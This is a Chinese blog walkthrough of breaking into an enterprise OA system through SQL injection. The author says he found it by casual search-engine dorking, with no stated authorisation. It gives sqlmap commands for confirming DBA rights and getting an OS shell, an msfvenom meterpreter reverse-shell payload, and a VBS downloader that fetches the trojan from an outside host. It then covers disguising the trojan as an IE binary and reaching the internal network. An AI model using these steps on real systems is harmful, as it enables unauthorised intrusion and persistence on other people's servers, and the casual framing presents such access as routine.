大横幅1
大横幅2
到期时间:永久 到期时间:推广
小横幅3 小横幅4
  1. 当前位置:网站首页 > 技术教程

某OA系统SYSTEM权限SQL注入


0x01 发现漏洞

七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统
某OA系统SYSTEM权限SQL注入

IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注入

在用户名里输入admin’,不负期望地报了错

某OA系统SYSTEM权限SQL注入

很明显,前后端都没有对用户的输入进行过滤,直接将’带入了SQL语句进行。初步判断,此OA系统存在SQL注入漏洞

0x02 漏洞验证

打开BurpSuite,设置好浏览器代理,抓下HTTP请求,一气呵成。
某OA系统SYSTEM权限SQL注入

问题参数为 txtLogin=admin%27,可将整个请求复制到 test.txt,使用sqlmap -r 来注入

  •  
sqlmap -u http://x.x.x.x/xx.aspx --forms

某OA系统SYSTEM权限SQL注入

至此,可以确认存在error-based、stack quires和time-based三个类型的漏洞

0x03 判断数据库用户的权限

发现SQL注入后,首先要判断权限,高权限的注入可以为后续渗透省下很大功夫

  •  
sqlmap -u http://x.x.x.x/xx.aspx --forms --is-dba

某OA系统SYSTEM权限SQL注入

非常nice,再次不负期望地返回了DBA权限,输入以下命令,获得一个shell

  •  
sqlmap -u http://x.x.x.x/xx.aspx --forms --os-shell

某OA系统SYSTEM权限SQL注入

NT/SYSTEM权限,时隔两个多月,复现有误,不予贴图

0x04 反弹shell 深入内网

生成一个shell

  •  
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx > /var/www/html/shell.exe

 

由于环境艰难,不能直接上传文件,我选择了用vbs脚本来下载木马到服务器

 

代码如下:

Set post=CreateObject("Msxml2.XMLHTTP")post.Open "GET","http://x.x.x.x/shell.exe"'发送请求post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()'等待3秒,等文件下载wscript.sleep 3000 aGet.Write(post.responseBody)'写数据aGet.SaveToFile "shell.exe",2

用echo命令缓慢地写完了vbs脚本之后,顺利运行,下载木马

更改名字,移动到IE安装目录进行伪装

某OA系统SYSTEM权限SQL注入

start iee.exe 运行木马,metasploit成功收到了SYSTEM权限的shell

 

该主机拥有内网IP,存在内网,可以互通,并且该主机作为中央数据

某OA系统SYSTEM权限SQL注入网主机皆为VMware虚拟机某OA系统SYSTEM权限SQL注入

0x05 结束测试,提交漏洞

本次渗透测试成功拿到最高权限, 到此为止,不再深入。
随着攻击与防御技术的彼此攀升,程序员的安全意识逐渐提高,SQL也越来越少。

但不少粗糙的程序和古老的系统仍然存在此漏洞,此类漏洞解决方法简单,只用对用户输入参数稍加处理即可.

 

本文最后更新于2023-3-15,已超过 3个月没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
获取更多资讯请加入交流群

    协助本站SEO优化一下,谢谢!
    关键词不能为空
版权说明

本文地址:http://www.kirinbk.cn/post-1032.html
免责声明:本站文章仅用于科普及教育用途,远离犯罪!

发表评论

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注